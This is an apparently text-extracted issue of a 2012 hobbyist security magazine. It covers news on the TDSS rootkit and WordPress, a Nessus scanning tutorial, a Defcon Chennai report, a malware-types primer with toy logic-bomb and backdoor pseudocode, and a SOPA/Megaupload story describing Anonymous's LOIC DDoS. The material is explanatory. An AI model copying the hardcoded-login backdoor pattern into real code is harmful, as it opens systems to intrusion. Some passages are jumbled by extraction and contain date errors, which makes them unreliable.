Page 1


EDITORIAL

Hope you guys have enjoyed our last issue. ImHaker has a grand success in its first issue. Massive downloads, Feedbacks and suggestions too. I thank all you friends for this victory. Most of the readers write us to increase the technical content. Since most of the hacking magazines are more complex for common people and n00bs, ImHaker changes the rule to make the content very clear to the common people. Think again most of the cybercrimes take place, whenever the user is not knowledge enough. So that we make the content clear to all kind of people. But we will get into the interior platform step by step as the readers evolved through. However as per your request we have added some technical content to this month’s issue. Enjoy this issue; send us more suggestions and feedback. - Gowtham

2 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


CONTENTS

What is inside ?! Haker Events [ 04 ]

Hackers Distributing TDSS Rootkit [ 06 ]

Zscaler Launches Free Network Vulnerability URL Scanning Service Scanning [ 08 ] [ 10 ] Defcon Chennai, Jan 2012 [ 14 ]

Malware Variants Explained [ 20 ]

Report on Internet Censorship* [ 26 ]

Facebook Malwares Explained [ 36 ]

Fake Apps on Android Shortage of HDDs in Market 2012 [ 42 ] [ 48 ] Google TV Devices Updated [ 49 ] 3 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM

Geek Jokes [ 50 ] [*Cover Story]


HAKER EVENTS InfoSec Southwest 2012 When: Wednesday, 1 Feb 2012 Where: Austin, Texas http://www.infosecsouthwest.com/cfp.html

BugCON Security Conference ‘12 When: February 2 - 3, 2012 Where: Mexico City, Mexico http://www.bugcon.org

NDSS Symposium 2012 When:Sun, Feb 5, 2012 - Thu, Feb 9, 2012 Where:San Diego, California USA http://www.isoc.org/isoc/conferences/ndss/

EVENTS OF THE MONTH ESSoS‘12 International Symposium When: 16 Feb 2012 - 17 Feb 2012 Where: Eindhoven, Netherlands http://goo.gl/EBPkh

13th Annual Privacy and Security Conference When: 16 February - 17 February 2012 Where: Victoria Conference Centre, BC, Canada http://www.rebootconference.com/privacy2012/

CODASPY’12 — Second ACM Conference on Data and Application Security and Privacy

SANS Secure India 2012

When: 08 Feb 2012 - 12 Feb 2012

When: 20 Feb 2012 - 25 Feb 2012

Where: San Antonio, TX, United States

Where: Bangalore, India

http://www.codaspy.org/

http://www.sans.org/info/83954

SANS Phoenix 2012

RSA Conference 2012

When: February 13 - 18, 2012

When: Mon, Feb 27, 2012 - Sat, Mar 2, 2012

Where: Phoenix, AZ

Where: San Francisco, California USA

http://www.sans.org/info/91511

http://www.rsaconference.com/

Nullcon Goa 2012

You Shot The Sherif 6 (YSTS 6)

When: February 15 - 18, 2012

When: Sunday, 26 Feb 2012

Where: Goa, India

Where: Sao Paulo, Brazil (map)

http://www.nullcon.net/site/conference.php

http://www.ysts.org/

4 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


FC’12 Financial Cryptography and Data Security 2012 When: 27 Feb 2012 - 02 Mar 2012 Where: Bonaire, Netherlands Antilles http://fc12.ifca.ai/

SecurityXploded/null/G4H/Owasp When: 4th Feb 2012 Where: Bangalore, India

SANS Mobile Device Security Summit 2012 When: 12 Mar 2012 - 15 Mar 2012 Where: Nashville, United States http://www.sans.org/info/94424

Black Hat Europe 2012 When: March 14 - 16, 2012 Where: Amsterdam, The Netherlands

http://securityxploded.com/

http://www.blackhat.com/html/bh-eu-12/bheu-12-home.html

AtlSecCon 2012

CFP Deadline: BRUCON

When: Thu, Mar 1, 2012 - Sat, Mar 3, 2012

When: Thursday, 15 Mar 2012

Where: Halifax, Canada

Where: Aula Academica of the Ghent, Belgium

http://atlseccon.com/

http://blog.brucon.org/2012/01/cfpcft-is-openstart-submitting-your.html

SANS Secure Singapore 2012 When: 05 Mar 2012 - 17 Mar 2012 Where: Singapore, Singapore http://www.sans.org/info/84259

SANS Germany 2012 When: 05 Mar 2012 - 10 Mar 2012 Where: Stuttgart, Germany http://www.sans.org/info/92184

CanSecWest 2012 When: 7 – 9 Mar 2012 Where: Sheraton Wall Centre, Canada http://cansecwest.com/

SecureIT 2012 When: Sun, Mar 18, 2012 - Wed, Mar 21, 2012 Where: Ontario, California USA http://www.secureitconf.com/

SANS 2012 When: Fri, Mar 23, 2012 - Sat, Mar 31, 2012 Where: Orlando, Florida USA http://www.sans.org

InfoSec Southwest 2012 When: 30 Mar – 1 Apr 2012 Where: Austin, Texas, USA http://www.infosecsouthwest.com/

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 5


HAKER NEWS

HACKERS DISTRIBUTING TDSS ROOTKIT ! VULNERABILITY IN WORDPRESS 3.2.1

Hackers are compromising WordPress blogs, in order to infect their visitors with the infamous TDSS rootkit, according to researchers from Web security firm Websense. Compromised WordPress 3.2.1 blogs infect visitors with TDSS rootkit through Java exploits. It’s not clear how the websites are being compromised, but there are publicly known exploits for vulnerabilities that affect WordPress 3.2.1, which is an older version of the popular blog publishing platform. Once they gain unauthorized access to a blog, the attackers inject malicious JavaScript code into its pages in order to load a Java exploit from a thirdparty server. “From our analysis the number of infections is growing steadily (100+),” said Websense principal security researcher Stephan Chenette in a blog post.

The company’s research into this mass code injection campaign indicates that whoever is behind it is experienced. The Java vulnerability exploited in the attack is known as CVE-2011-3544 and allows the remote execution of arbitrary code. In this case, the attackers are leveraging it to install a version of the TDSS rootkit on the computers of people visiting the website. “The TDSS rootkit is one of the stealthiest rootkits in the wild. Its goal is to acquire total control of infected PCs and use them as zombies for its botnet”. The CVE-20113544 vulnerability started being targeted by most exploit toolkits in December 2001. These attack frameworks usually contain exploits for vulnerabilities in several software products like Adobe Reader, Flash Player and Java.

6 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


The Websense researchers are not sure if this mass code injection campaign uses an updated toolkit or an entirely new one, but experts from security firm M86 Security have tied recent WordPress 3.2.1 compromises to the Phoenix Exploit Kit. The people behind these attacks are trapping victims to the infected websites by sending them spam emails that contain malicious links. The fact that these links lead to genuine blogs helps attackers bypass URL reputation filters. It’s not vibrant if the attacks analyzed by M86 Security and Websense are perpetrated by the same gang, but since they both target WordPress 3.2.1 blogs, webmasters are urged to upgrade to the latest version of WordPress, which at this time is 3.3.1. In order to protect themselves from exploits, Web users should keep the software installed on their computers up to date, especially their OS, browser and browser plug-ins. The Java vulnerability exploited in the attack is known as CVE-2011-3544 and allows the remote execution of arbitrary code. In this case, the attackers are leveraging it to install a version of the TDSS.

A website asking the user permission to run a malicious java runtime on the web browser.

If you think your computer is affected by this malware, download the removal tool from kaspersky labs. The kaspersky labs developed a removal tool specifically to remove the TDSS rootkit. get it from the below wesite: http://support.kaspersky.com/faq/?qid=208280684

.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 7


HAKER NEWS

Zscaler launches free URL scanning service http://zulu.zscaler.com/

Cloud security vendor Zscaler has launched a new free-to-use online service called Zulu that can assess the security risk associated with URLs by analyzing the content they point to, as well as the reputation of their corresponding domain names and IP addresses. There are several free URL scanning services available online and all of them are useful in their own right. While conceptually similar to other such scanners, Zulu does have a few features that make it stand out. For example, Zulu allows security-savvy users who investigate various Web attacks to choose what User-Agent and Referrer headers the scanner will use when accessing a URL. There are a lot of attack pages that only serve malicious content to visitors who arrive there from a certain website, most commonly a search engine, or only to visitors who use a certain browser. Zulu assesses the risk of a Web resource’s content, its URL and host individually and assigns a score for each of these categories based on several tests. The scores are then combined to determine the overall risk associated with the resource.

8 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


A unique benefit of this approach is that we can deliver a risk score even when the page content is no longer available. While we can’t access the page, we can still assess the URL and host and when they deliver a high risk score despite a lack of page content, one can often conclude the page was indeed malicious but has since been taken down. Depending on the type of content a URL points to, Zulu can perform an antivirus scan using the VirusTotal multi-engine service, try to match a file’s MD5 hash in Zscaler’s database, search for known JavaScript obfuscation patterns and phishing heuristics, or use the company’s malware detection technologies.

A Web resource’s URL is verified against publicly known blacklists and its domain name is checked for suspicious strings of characters. The historical abuse levels of a particular TLD and the risk associated with an IP address’ geographical location are also taken into consideration when establishing the final risk score. According to the researcher, the company decided to launch Zulu as a free tool in order to experiment with new detection techniques before using them in its commercial products. As the service gains popularity, it will also help Zscaler discover more malicious websites and improve the accuracy of its database. But Zscaler doesn’t have any plans to offer an open API (application programming interface) for service at this time.

.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 9


HAKER LAB

NETWORK VULNERABILITY SCANNING BASIC NETWORK HOST SCAN USING NESSUS

Nessus is an exclusive network vulnerability scanning program. It is free of charge for personal use in a non-enterprise environment. Its goal is to detect potential vulnerabilities on the tested systems. For example, it can detect vulnerabilities that allow a remote cracker to control or access sensitive data on a system, misconfigured systems, Default passwords, a few common passwords, and blank/absent passwords on some system accounts. Nessus can also call Hydra (an external tool) to launch a dictionary attack. Denials of service against the TCP/IP stack by using mangled packets and Preparation for PCI DSS audits. This article shall endeavour to cover the basics of Nessus scanning. Download and install Nessus from the official website, http://www.tenable.com/products/nessus After installation you’ll have two shortcuts in the desktop. The Nessus Client and Server. First run the Nessus Server, click on obtain activation code button and get the activation code as Professional Feed (If you want to use Nessus for Corporate use) or Home Feed (If you want to use Nessus for Home use). Get the activation code and activate Nessus. 10 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


Before starting the Server, Update the plugins. After update, add user with the username and password as you wish and then run the server. Now run the Nessus Client from your Desktop. Enter the user name and password you have created in the server.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 11


HAKER LAB Now you will be redirected to the home page of Nessus Scanner. At the top of the page you can see a menu, Click on Scans => in the scans page, Click on Add. In the Add scan menu, give the name as you wish. Select type “Run now”. Select policy as you wish. There are four Nessus scan policy templates will appear in the “Policies” tab:

Add scan page in Nessus

Scan in progress

External Network Scan - This policy is tuned to scan externally facing hosts, which typically present fewer services to the network. Also, all 65,535 ports are scanned for on the target. Internal Network Scan - This policy is tuned for better performance, taking into account that it may be used to scan large internal networks with many hosts, several exposed services, and embedded systems such as printers. 12 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


Web App Tests - If you want to scan your systems and have Nessus detect both known and unknown vulnerabilities in your web applications, this is the scan policy for you. Scan includes XSS, SQL, command injection and several more. Prepare for PCI DSS audits - This policy enables the built-in PCI DSS compliance checks that compare scan results with the PCI standards and produces a report on your compliance posture. In the target box enter the IP address of the hosts you wish to scan for. You can scan more than one host at a time, so add all the IP address of target system one IP per line. You can upload a *.nessus file contains list of all targets using the “Targets file” option & click on “Launch scan” at the bottom of the screen.

Now you will see the scanning progress bar and the % of completion. After the completion, double click on the link will opens a page which contains the report about the target.

You can view the minimized report by applying some filters and download the detailed report about the target as *.Nessus file, *.HTML file or *.rtf file.

.

That’s it for now friends you have successfully completed the network vulnerability test using Nessus. We will discuss the detailed scanning on future issues. WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 13


HAKER LIVE !

DEFCON CHENNAI, JAN 2012 Information Security Meet

DEFCON Chennai, one of the superlative information security conferences in tamilnadu, India had their fourth meet on January 29, 2012 at Le Waterina Resort, Chennai organized by Mr.Hari Krishnan and Mr.Vikneshvaran.

There were several presentations and live hacking has been illustrated. The presentations were informative and make awareness to the people about avoiding the potential hacking attacks in the wild.

Defcon Chennai is the group under the DEFCON, international hacking conference. The team has already succeeded three information security conferences. For every meet they call for papers in their blog. The topics for paper presentations are not limited any specific.

The participants were members of various Indian hacking crews such as ICA, ICW, ICF and etc. And there is no surprise that we have met the other security media such as THN and EHN.

The meet was a grand success with nine speakers and 40-50 participants. The objective of the meet to share the latest trends in security platform and to meet up with new people to build a network for information security.

It was a surprise that Mr.Kaushal Sharma one of the nine speakers, who present a paper on “DuQu Malware� was a high school student. The conference encourages youngsters to take place in the presentation. We saw some school students also participate in the conference.

The people from all over the country have attended the conference.

ImHaker has the full report on the entire conference with photographs.

14 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


All the participants and speakers waiting at the hall.

The Karma Hall, where the conference took place.

Welcome notes given by Mr. Hari krishnan, one of the organizers of Defcon Chennai.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 15


HAKER LIVE !

Mr.Aditya Gupta, “Android Exploitation for fun and profit”

Mr.Karthick, “Fuzzing for fun and profit”

Mr.Prateek Dwivedi, “Symlinking”

16 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


Mr.Amrinder Singh, “Wiimote”

Mr.Ravi Kumar, “Social Network Security” & “CSS attacks N’ cookie hijacking”

Mr.Kaushal Sharma, “DuQu Malware”

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 17


HAKER LIVE !

Mr.Abhinab, “GPRS Hacking”

Mr.Pranav Mishra, “Denial of Service & Revenge Concept Disclosure”

Mr.Sai Satish, Admin, Andrahackers. com

18 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


Vote of Thanks given by Mr.Viknesvaran, one of the organizers of Defcon Chennai.

Mr.Karthick has awarded as the “outstanding speaker”.

courtesy: Mr.Arush Sal for photographs. At the end of the presentations Mr.Sai Satish, The owner of Andrahackers.com and member of ICW had given a nice speech about website defacements. He claims the hackers to avoid website defacements only for fun and revenge, because it doesn’t benefit to the country. So make only things that are benefit able to the country. He donated 3000 INR to a welfare association, which used to educate children about open source and free software. The Organization was initiated by Mr. Satheesh Kumar.

.

The vote of thanks was given by Mr.Viknesvaran. He thanks all the participants and speakers who make the conference a grand success. WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 19


MALWARE

Malware variants explained Report on different malwares in the wild The last month issue of ImHaker features the malware basics and its types. Here we describe briefly about each malware type and its characteristics with examples. There are several malware variants in the wild such as Logic Bomb, Trojan horse, Back Door, Virus, Worm, Rabbit, Spyware, Adware, Zombies and some hybrid malware which has combination of two or more malware characteristics together. Logic Bomb: A logic bomb is a malware variant, which consists of two parts: A pay load, which is an action to perform. The payload can be anything, but has the connotation of having a malicious effect. A trigger, a boolean condition that is evaluated and controls when the payload is executed. The exact trigger condition is limited only by the imagination, and could be based on local conditions like the date, the user logged in, or the operating system version. Triggers could also be designed to be set off remotely, or be set off by the absence of an event. Logic bombs can be inserted into existing code, or could be standalone. A simple parasitic example is shown below, with a payload that crashes the computer using a particular date as a trigger. 20 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM

!--legitimate code--! if day is Friday: crash computer !--legitimate code--! Trojan horse: A Trojan horse is a program which purports to do some benign task, but secretly performs some additional malicious task. A classic example is a password-grabbing login program which prints authentic-looking “username” and “password” prompts, and waits for a user to type in the information. When this happens, the password grabber stashes the information away for its creator, and then prints out an “invalid password” message before running the real login program. The unsuspecting user thinks they made a typing mistake and reenters the information, none the wiser. Trojan horses have been known about since at least 1972. (e.g) Generic.tfr!5EB4E2D36DBA Risk level: Low Date discovred: 2/4/2012


Back Door: A back door is any mechanism which bypasses a normal security check. Programmers sometimes create back doors for legitimate reasons, such as skipping a time-consuming authentication process when debugging a network server. As with logic bombs, back doors can be placed into legitimate code or be standalone programs. The example back door below, bypasses a login authentication process. username = read_usr() password = read_pwd() if username is “h4ck0r”: return ALLOW_LOGIN else: return DENY_LOGIN

One special kind of back door is a RAT, which stands for Remote Administration Tool or Remote Access Trojan, depending on who’s asked. These programs allow a computer to be monitored and controlled remotely; users may deliberately install these to access a work computer from home, or to allow help desk staff to diagnose and fix a computer problem from afar. However, if malware Surreptitiously installs a RAT on a computer, then it opens up a back door into that machine. (e.g) Backdoor.Whalfrost!gen Date discovred: 2/2/2012

Virus: A virus is malware that, when executed, tries to replicate itself into other executable code; when it succeeds, the code is said to be infected. Whenever the infected code runs, it can infect new code in turn. This self-replication into existing executable code is the key defining characteristic of a virus. When faced with more than one virus to describe, a rather pointless problem arises. There’s no agreement on the plural form of “virus.” The two leading contenders are “viruses” and “virii;” the latter form is often used by virus writers themselves, but it’s rare to see this used in the security community, who prefer “viruses”. Traditionally, viruses can propagate within a single computer, or may travel from one computer to another using human-transported media, like a DVD-ROM, Memory card or USB flash drive. In other words, viruses don’t propagate via computer networks; networks are the domain of worms instead. However, the label “virus” has been applied to malware that would traditionally be considered a worm, and the term has been watered down in common usage to refer to any sort of selfreplicating malware. Viruses can be caught in various stages of self-replication. A germ is the original form of a virus, prior to any replication. A virus which fails to replicate is called an intended.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 21


MALWARE This may occur as a result of bugs in the virus, or encountering an unexpected version of an operating system. A virus can be dormant, where it is present but not yet infecting anything -

Rabbit: Rabbit is the term used to describe malware that multiplies rapidly. Rabbits may also be called bacteria, for largely the same reason.

for example, a Windows virus can reside on a Unix-based file server and have no effect there, but can be exported to Windows machines”.

There are actually two kinds of rabbit. The first is a program which tries to consume all of some system resource, like disk space. A “fork bomb,” a program which creates new processes in an infinite loop, is a classic example of this kind of rabbit. These tend to leave painfully obvious trails pointing to the perpetrator, and are not of particular interest.

Worm: A worm has several characteristics as like as virus. The most important characteristic is that worms are self-replicating too, but self-replication of a worm is distinct in two ways. First, worms are standalone, and do not rely on other executable code. Second, worms spread from machine to machine across networks. These days’ worms are the preferred malware variant for the hackers. The malware, which spreads through USB Flash drives and Memory cards are most likely to be worms. These new age worms have the capability to steal the contact list from the infected computer and then attach them-self to the email messages. I.e. spreads through internet. (e.g) W32.Pilleuz!gen30 Date discovered: 02/01/2012

The second kind of rabbit, which the characteristics above describe, is a special case of a worm. This kind of rabbit is a standalone program which replicates itself across a network from machine to machine, but deletes the original copy of itself after replication. In other words, there is only one copy of a given rabbit on a network; it just hops from one computer to another. Rabbits are rarely seen in practice. Spyware: Spyware is software which collects information from a computer and transmits it to someone else. The exact information spyware gathers may vary, but can include anything which potentially has value:

22 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


1. Usernames and passwords. These might be harvested from files on the machine, or by recording what the user types using a key logger. A keylogger differs from a Trojan horse in that a keylogger passively captures keystrokes only; no active deception is involved. 2. Email addresses, which would have value to a spammer. 3. Bank account and credit card numbers. 4. Software license keys, to facilitate software pirating. Viruses and worms may collect similar information, but are not considered spyware, because spy ware doesn’t self-replicate. Spy ware may arrive on a machine in a variety of ways, such as bundled with other software that the user installs, or exploiting technical flaws in web browsers. The latter method causes the spyware to be installed simply by visiting a web page, and is sometimes called a drive-by download.

Adware may also gather and transmit information about users which can be used for marketing purposes. As with spyware, adware does not self-replicate. Hybrids, Droppers, and Blended Threats: The exact type of malware encountered in practice is not necessarily easy to determine, even given these loose definitions of malware types. The nature of software makes it easy to create hybrid malware which has characteristics belonging to several different types. You can realise a typical hybrid malware that spreads through the Bit Torrent, P2P networks in the wild.

There are other combinations of malware too. For example, a dropper is Malware which leaves behind, or drops, other malware. A worm can propagate itself, depositing a Trojan horse on all computers it compromises; a virus can leave a back door in its wake. A blended threat is a viAdware: Adware has similarities to spyware in that rus that exploits a technical vulnerability both are gathering information about the to propagate itself, in addition to exhibiting “traditional” characteristics. user and their habits. This has considerable overlap with the definition of a worm, especially since many worms exploit technical vulnerabilities. These technical vulnerabilities have historically required precautions and defences distinct from those that anti-virus vendors provided, and this rift may acFor example, a search for “Robot” may re- count for the duplication in terms. The Insult in an unwanted pop-up advertisement ternet worm was a blended threat, according to this definition. for “books about Robot”. Adware is more marketing-focused, and may pop up advertisements or redirect a user’s web browser to certain web sites in the hopes of making a sale. Some adware will attempt to target the advertisement to fit the context of what the user is doing.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 23


MALWARE Zombies: Computers that have been compromised can be used by an attacker for a variety of tasks that are anonymous to the legitimate owner; computers used in this way are called zombies. The most common tasks for zombies are sending spam and participating in coordinated, large-scale denial-of-service attacks [DoS, DDoS]. Sending spam violates the acceptable use policy of many Internet service providers, not to mention violating laws in some authorities.

Sites known to send spam are also blacklisted, marking sites that engage in spamrelated activity so that incoming email from them can be summarily rejected. It is therefore ill-advised for spammers to send spam directly. In such a way that it can be traced back to them and their machines. Zombies provide a windfall for spammers, because they are a free, throwaway resource: spam can be relayed through zombies, which obscures the spammer’s trail. And a blacklisted zombie machine presents no suffering to the spammer. As for denials of service, one type of denial-ofservice attack involves either flooding a victim’s network with traffic, or crushing a legitimate service on the victim’s network with requests. Another issue is how to control zombie networks. One method involves zombies listening for commands on Internet Relay Chat (IRC) channels, which provides a relatively anonymous, scalable means of control.

Typical DDoS attack illustrated.

When this is used, the zombie networks are referred to as botnets, named after automated IRC client programs called bots.

24 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


FAKE AVs: Fake AVs are the malware programs that are skinned more likely to be an Anti-Malware program. This type of malware ruled the cyber world in the years of 2009-10. This malware was programmed well as well as designed well to make user believe it as an Anti-Virus program. This malware targets the innocent N00b users. It spreads through Drive-By-Download. Below screenshot shows a website that illustrates a fake scan inside the browser window as like as the original one by using the CSS code.

If the user clicks the install link. It will automatically drop a payload from a remote server that installs the actual malware when it is executed by the user. This Fake AV frequently shows a false message with fake scanning mechanisms and forces the user to buy the fake product. The innocent users who click the buying link will lost their money, probably profit to the malicious programmer. The new malwares in the wild are more intelligently programmed and hybrid of all these malware types. The new age malwares are programmed to affect different platforms such as Web browser add-ons, Mobile apps and Scripts. We will discuss the entire malware world in future issues.

.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 25


COVER STORY

STOP ONLINE PIRACY ACT & Protect Intellectual Property Act (SOPA/PIPA) Detailed report on internet censorship

This January, the entire cyber world has been abuzz with SOPA (the “Stop Online Piracy Act”) and PIPA (the “Protect Intellectual Property/IP Act”). Most of the internet giants opposed these 2 acts that intimidate to put an end to the way, we share & express on the internet. On January 18, Wednesday Wikipedia went to the extent of blackening out their entire site for a period of 24 hours and other websites such as Mozilla, Google, Reddit, EBay, Wired and over ~7000 other smaller websites. Most of us know and understand that SOPA & PIPA will bring heavy censorship on internet sharing; however, this article will give some details about, how these 2 acts will work? And what are the problems with these acts? Websites that provide and share links or host pirated files often spring up in wide range places, away from US authority. But the Justice Department could ask the internet providers to block such websites. Even search engines like Google could be asked to exclude search results from blocked websites. Credit card companies and payment gateways like PayPal could be asked to block payment and companies could be prohibited from placing ads on such sites. 26 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


The primary supporters of SOPA are such copyright holders and industry bodies like the Motion Picture Association of America (MPAA) and the Recording Industry Association of America (RIAA), other ~350 business and organizations including NBC Universal, Pfizer, Ford Motor Company, Revlon, NBA, Macmillan US, Business Software Alliance, Information Technology and Innovation Foundation, Entertainment Software Association. Recently, GoDaddy one of the top web hosting service also stated that it supports SOPA. Christopher Dodd, Chairman of MPAA.

You may think that what’s the problem with that? Wouldn’t blocking piracy websites be good? Now think about this, who defines what constitutes pirated content? Would simply talking about a pirated movie on your blog be construed as promotion of piracy? What about a situation where a website is unknowingly hosting pirated content? For instance, file sharing websites have user uploaded content. Their terms and conditions may clearly state that sharing of pirated content is illegal and they are constantly taking down offending material and blocking users. But it’s impossible to monitor millions of users in real time. Should the file-sharing service be penalized for what the users upload? Similarly, many websites that you use (like Facebook, Twitter or Google services) rely on user content. SOPA proposes up to five-year prison term for those found guilty of piracy or counterfeiting goods (for the first offence, if found guilty of streaming 10 pieces of copyrighted content within six months). The loose wording of the law states that the offending domain will be blocked. This is downright silly, as can easily be illustrated with these examples: if a single blog on BlogSpot or WordPress is hosting copyrighted content, all our blogs on these two sites will be branded as illegal by the US government. If you owned a single blog hosted on the Google’s BlogSpot and one of the unknown user (knowingly or unknowingly) posts or commented any copyrighted content on your blog, the entire BlogSpot will be taken down and if anyone shares or posted the same on Facebook, Twitter, Google or similar websites, it can also get blocked and ultimately lead to their closure. WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 27


COVER STORY The internet giant such as Google, Yahoo, YouTube, Facebook, Twitter, AOL, LinkedIn, eBay, Mozilla corporation, Kaspersky Lab, Mojang AB, Roblox, Riot Games and Epic Games, Reddit, Wikipedia, Wikimedia Foundation, Reporters Without Borders, Electronic Frontier Foundation (EFF), ACLU, Human Rights Watch. Most of these companies shown their protest by means of website blackout.

Famous internet websites has been blackout to protect the internet against SOPA/PIPA

28 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


SOPA’s First Hunt: On January 19, 2012, Megaupload, one of the biggest file sharing website has been shut down by the US Department of Justice and the Federal Bureau of Investigation. The US Department of Justice said it charged seven people and two corporations with running what it called an international organized criminal enterprise allegedly responsible for massive worldwide online piracy of numerous types of copyrighted works. The DoJ stated that through the company known as Megaupload.com and other related sites, the group has generated more than $175 million in criminal proceeds and cost copyright holders more than half a billion dollars.

The Department of Justice, US stated that, “This action is among the largest criminal copyright cases ever brought by the United States and directly targets the misuse of a public content storage and distribution site to commit and facilitate intellectual property crime”. Specifically Megaupload Limited and Vestor Limited were indicted by a grand jury in the Eastern District of Virginia and charged with engaging in a racketeering conspiracy, conspiring to commit copyright infringement, conspiring to commit money laundering and two substantive counts of criminal copyright infringement. The individuals each face a maximum penalty of 20 years in prison on the charge of conspiracy to commit racketeering, five years in prison on the charge of conspiracy to commit copyright infringement, 20 years in prison on the charge of conspiracy to commit money laundering and five years in prison on each of the substantive charges of criminal copyright infringement.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 29


COVER STORY

Kim Dotcom, the CEO of Megaupload.com arrested with other shareholders.

The DoJ said that, police executed more than 20 search warrants in the United States and eight countries, seized approximately $50 million in assets and targeted sites where Megaupload has servers in Ashburn, Va., Washington, D.C., the Netherlands and Canada. In addition, the U.S. District Court in Alexandria, Va., ordered the seizure of 18 domain names associated with the alleged Mega conspiracy. According to the indictment, the conspiracy for over five years operated websites that unlawfully reproduced and distributed infringing copies of copyrighted works, including movies - often before their theatrical release - music, television programs, electronic books, and business and entertainment software on a massive scale. The conspirators’ content hosting site, Megaupload.com, is advertised as having more than one billion visits to the site, more than 150 million registered users, 50 million daily visitors and accounting for four percent of the total traffic on the Internet. 30 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


The Protest of Anonymous:

This actions led to what Anonymous (Hacktivist crew) called “the single largest Internet attack in its history”. Barrett Brown, described as a spokesperson for the group Anonymous by the state-run news outlet RT, said the timing of the raid “couldn’t have come at a worse time in terms of the government’s standpoint” and said that the websites of the Justice Department, FBI, Universal Music Group, the Recording Industry Association of America (RIAA), the Motion Picture Association of America (MPAA), and Broadcast Music Inc. had been shut down. Some commentators and observers have asserted that the FBI shut down of Megaupload proves that SOPA and PIPA are unnecessary. Although the actions of Anonymous received support, others have argued that the denial of service attack risked damaging the anti-SOPA case. The attack included a new, sophisticated method whereby internet users who clicked on links placed in chat rooms and on twitter participated, some without their knowledge, in a denial of service attack (DoS), thereby breaking existing US law. Anonymous used “Low Orbit Ion Cannon” (LOIC) to attack supporters of SOPA on January 19th, 2012. Anonymous claimed this to be their largest attack with over 5,635 people participating in the DDoS attack via LOIC. LOIC was utilized by many attackers, despite the fact that a network firewall could easily filter out network traffic it generates, thus rendering it only partly effective. The group threatened to shut down Facebook’s 60,000 servers in Operation Global Blackout on January 28, 2012.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 31


COVER STORY The LOIC Attack: This attack works similar to the typical DoS/DDoS attack as illustrated below,

}

The Attracker distributes the target IP to the internet using social networks, chat rooms, email, spam..etc.

} }

The links were shared by protesters and other innocent people who didn’t know what they were sharing!

The link reaches maximum number of users. They click the link and make a DoS/ DDoS Attack to the target.

32 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


LOIC Tool kit used to flood the twitter with java exploit!

After shutdown of the megaupload, Most of the other file sharing websites got panic and cleaned suspected files shared and hosted in their server without user acknowledgement. Another famous file sharing website Filesonic has recently blocked publicly sharing the files on the internet via a URL link. The user must be logged into their account to download the hosted files and the user who uploaded the file can only access the file. Most of the other file sharing websites are under pressure too.

WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 33


COVER STORY Protestors argue that the internet should be open for anyone to access global resources and to exercise the right to free speech. If SOPA comes into effect and a list of blocked websites has to be maintained by the internet service provider, then the operator will also have to monitor the internet traffic of each and every user. This not only raises issues of privacy but also opens a door for hackers to gain access to sensitive user data. SOPA will, in essence, legitimize censorship; make it ‘acceptable’ or the ‘right thing to do’. The US government will reserve the right to brand any website as illegal and cut off all support to it. This will hurt entrepreneurial online ventures, hurt jobs and several of your favorite websites may be gone forever too. Plus there will always be ways to get around censorship and those in the know will manage - just the regular users of the internet will be affected. Lawmakers from the leftist Palikot’s Movement cover their faces with masks as they protest against ACTA during a parliament session:

34 | FEBRUARY | IMHAKER MAGAZINE | WWW.IMHAKER.COM


On January 26, 2012 Poland signed an international copyright agreement, sparking more demonstrations by Internet users who have protested for days over fear it will lead to online censorship. After the signing, protesters rallied in the Polish cities of Poznan and Lublin to express their anger over the treaty. Lawmakers for the leftwing Palikot’s Movement wore masks in parliament to show their dissatisfaction, while the largest opposition party — the right-wing Law and Justice party — called for a referendum on the matter.

Hackers Launching Satellite to Evade Internet Censorship:

During the Chaos Communication Congress in Berlin back in August -- an annual hacker conference sponsored by the German Chaos Computer Club -- a team of German hackers revealed plans to launch their own communication satellites into space in order to create a separate, “uncensorable” network called the Hackerspace Global Grid (HGG). “The first goal is an uncensorable Internet in space. Let’s take the Internet out of the control of terrestrial entities,” said activist Nick Farr. According to the report, the team will start by launching three prototype ground stations in the first half of 2012, and then launch at least one satellite into low orbit to communicate specifically with those stations. “It’s kind of a reverse GPS,” explained Armin Bauer, an HGG participant. “GPS uses satellites to calculate where we are, and this tells us where the satellites are. We would use GPS coordinates but also improve on them by using fixed sites in precisely-known locations.”

.

However all these happenings prompt us that the technology has been evolved and even the government cannot control it. Build by people can only be controlled by people! WWW.IMHAKER.COM | IMHAKER MAGAZINE | FEBRUARY | 35


REAL TIME

